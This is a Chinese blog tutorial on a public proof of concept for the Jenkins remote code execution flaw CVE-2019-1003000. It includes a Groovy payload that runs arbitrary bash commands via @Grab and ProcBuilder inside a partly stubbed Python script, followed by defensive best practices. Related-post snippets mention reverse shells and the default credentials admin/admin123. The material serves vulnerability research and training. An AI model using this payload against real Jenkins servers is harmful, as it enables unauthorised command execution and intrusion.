Jenkins RCE 漏洞 PoC 教程

于 2024-08-20 09:04:02 发布
阅读量422 收藏 10
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00790/article/details/141342868
版权

Jenkins RCE 漏洞 PoC 教程

cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)项目地址:https://gitcode.com/gh_mirrors/cv/cve-2019-1003000-jenkins-rce-poc

项目介绍

本项目 cve-2019-1003000-jenkins-rce-poc 是一个用于演示 Jenkins 远程代码执行漏洞的证明概念(Proof of Concept, PoC)。该漏洞的 CVE 编号为 CVE-2019-1003000,涉及 Jenkins 的 Script Security 和 Pipeline 插件。通过此 PoC,用户可以了解和复现该漏洞,从而更好地理解和防范此类安全风险。

项目快速启动

环境准备

  1. 安装 Python 3.x
  2. 克隆项目仓库
git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
cd cve-2019-1003000-jenkins-rce-poc

安装依赖

pip install -r requirements.txt

运行 PoC

import argparse
import jenkins
import time
from xml.etree import ElementTree

payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy { }
print new ProcBuilder("/bin/bash").withArgs("-c", "%s").run().getOutputString()
'''

def run_command(url, cmd, job_name, username, password):
    print('[+] connecting to jenkins')
    server = jenkins.Jenkins(url, username, password)
    # 以下代码为示例,具体实现请参考项目文档
    # ...

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Jenkins RCE PoC')
    parser.add_argument('--url', required=True, help='Jenkins URL')
    parser.add_argument('--cmd', required=True, help='Command to execute')
    parser.add_argument('--job', required=True, help='Job name')
    parser.add_argument('--username', required=True, help='Jenkins username')
    parser.add_argument('--password', required=True, help='Jenkins password')
    args = parser.parse_args()

    run_command(args.url, args.cmd, args.job, args.username, args.password)

应用案例和最佳实践

应用案例

  1. 安全研究:安全研究人员可以使用此 PoC 来测试和验证 Jenkins 实例的安全性,确保其不受此漏洞的影响。
  2. 教育培训:在网络安全培训课程中,此 PoC 可以作为教学材料,帮助学员理解远程代码执行漏洞的原理和防范措施。

最佳实践

  1. 定期更新:确保 Jenkins 和相关插件始终更新到最新版本,以避免已知漏洞。
  2. 权限控制:严格控制 Jenkins 用户的权限,避免赋予不必要的权限,特别是“Overall/Read”权限。
  3. 安全审计:定期进行安全审计和漏洞扫描,及时发现和修复安全漏洞。

典型生态项目

  1. Jenkins:作为持续集成和持续部署(CI/CD)工具,Jenkins 是本项目的主要应用场景。
  2. Script Security 插件:用于增强 Jenkins 脚本的安全性,防止恶意代码执行。
  3. Pipeline 插件:用于编排和自动化 Jenkins 构建流程,提高开发效率。

通过以上内容,您可以快速了解和使用 cve-2019-1003000-jenkins-rce-poc 项目,并掌握相关的安全最佳实践。

cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)项目地址:https://gitcode.com/gh_mirrors/cv/cve-2019-1003000-jenkins-rce-poc

汤品琼Valerie
关注
POC_Jenkins
LiBai'S BLOG
06-09 9万+
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。......
CVE-2024-23897:Jenkins文件读取漏洞复现分析 [附POC]
薛定谔嘚喵博客
02-05 1241
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 。
Jenkins RCE 漏洞(CVE-2019-1003000) 复现
玄道的网安博客
09-24 3566
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
Jenkins RCE 漏洞复现(CVE-2017-1000353、CVE-2018-1000861)
oiadkt的博客
09-21 2122
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
Jenkins RCE 漏洞复现(CVE-2017-1000353)】
qq_61947585的博客
07-06 376
Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。6. 使用 CVE-2017-1000353-SNAPSHOT-all.jar 生成执行反弹 shell 命令的字节码文件 jenkins_poc.ser。这里应该可以监听到,成功反弹shell,但好像机子出现了点问题监听不成功,,
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 3021
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
cve-2019-1003000-jenkins-rce-pocJenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoCJenkins RCE SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2135
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1987
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 794
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现—CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
POC bomber -资源
11-19
POC bomber 的poc支持weblogic,tomcat,apache,jboss,nginx,struct2,thinkphp2x3x5x,spring,redis,jenkins,php语言漏洞,shiro,泛微OA,致远OA,通达OA等易受攻击组件的漏洞检测,支持调用dnslog平台检测...
JenkinsPOC
03-30
Salesforce DX项目:后续步骤 现在,您已经创建了Salesforce DX项目,下一步是什么? 以下是一些文档资源,可帮助您入门。 您如何计划部署更改? 您是否要部署一组更改或创建一个独立的应用程序? 选择一种。 配置您的Salesforce DX项目 sfdx-project.json文件包含sfdx-project.json有用配置信息。 有关此文件的详细信息,请参见《 Salesforce DX开发人员指南》中的“ ” 。 阅读所有关于它的内容
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4723
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
Jenkins RCE CVE-2016-0788分析及利用
Exploit的小站~
05-10 6020
Before Read 本文是去年乌云关站前夕在drops上发表的,但是之后的事情大家都知道,非常仓促,估计很多爬虫没有收录此文,我的blog上居然也没有留下,所以特地翻出来备份一下。 0x00 概述 国外的安全研究人员Moritz Bechler在2月份发现了一处Jenkins远程命令执行漏洞,该漏洞无需登录即可利用,也就是CVE-2016-0788。官方公告是这样描述此漏洞的: ...
Jenkins RCE PoC 项目教程
最新发布
gitblog_00122的博客
08-20 370
Jenkins RCE PoC 项目教程 cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline:...
jenkins未授权rce windows主机getshell
m0_46689007的博客
12-11 1439
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
Jenkins未授权访问RCE漏洞复现
公众号shadow sock7
02-22 1199
修改默认端口: java -jar jenkins.war --ajp13Port=-1 --httpPort=8081
RCE远程命令执行漏洞详解
一个努力学习网安的小牛马
10-26 393
RCE漏洞的描述危害以及解决方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

汤品琼Valerie

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值